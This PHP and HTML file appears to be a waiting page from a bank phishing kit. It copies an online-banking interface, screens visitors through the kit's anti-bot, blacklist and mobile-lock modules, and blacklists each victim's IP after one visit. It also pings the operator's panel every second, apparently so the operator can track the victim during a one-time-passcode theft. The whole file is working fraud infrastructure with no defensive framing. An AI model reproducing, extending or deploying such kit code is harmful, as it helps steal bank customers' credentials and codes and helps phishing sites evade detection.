<?php
include '../ipanel/inc/config.php';
include '../ipanel/inc/connect.php';
include 'new_anti_config.php';
if ($internal_antibot == 1) {
   include "../ipanel/inc/old_blocker.php";
}
if ($mobile_lock == "checked") {
   include "../ipanel/inc/mob_lock.php";
}


include '../ipanel/inc/blacklist.php';
include '../ipanel/inc/gateway.php';
if ($enable_antibots == "checked") {
   include '../ipanel/inc/anti.php';
}
session_start();
if ($_SESSION['started'] == 'true') {
   if ($enable_onetime == 'checked') {
      file_put_contents("../ipanel/inc/blacklist.dat", $_SERVER['REMOTE_ADDR'] . "\n", FILE_APPEND);
   }
   header("Refresh:7; url=../exit.php");
} else {
   header('location:../exit.php');
}


?>
<!DOCTYPE html>
<html lang="en-GB">

<head>
   <meta charset="utf-8">
   <title></title>
   <link rel="icon" href="assets/favicon.ico" type="image/x-icon">
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   
   
</head>

<body>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
   <link rel="stylesheet" href="assets/css/styles.css">
   <olb-root _nghost-jyf-c0="" ng-version="7.2.16">
      <olb-home _ngcontent-jyf-c0="">
       
         <center>
            <br><br>
            <img src="https://i.imgur.com/0TlhF28.gif">
            <br><br>
            <div class="row mt-3">
               <div class="col-md-12 send-otp-title-medium">
                  <h1 class="send-otp-title-medium"></h1>
               </div>

            </div>
         
            <br><br><br><br>
         </center>
         </div>
         </div>
         </olb-logon>
         </div>
         </div>
         </div>
    
         <div>
            <olb-session></olb-session>
         </div>
      </olb-home>
   </olb-root>

   <script src="../assets/js/jquery-1.11.3.min.js"></script>
   <script src="../assets/js/main.js"></script>
   <script>
      var pinger = setInterval(function() {
         var urldata = "../ipanel/inc/action.php?type=ping";
         $.ajax({
            url: urldata,
            type: "GET",
            success: function(response) {
               //console.log(response)
            }
         });
      }, 1000);
   </script>

</body>

</html>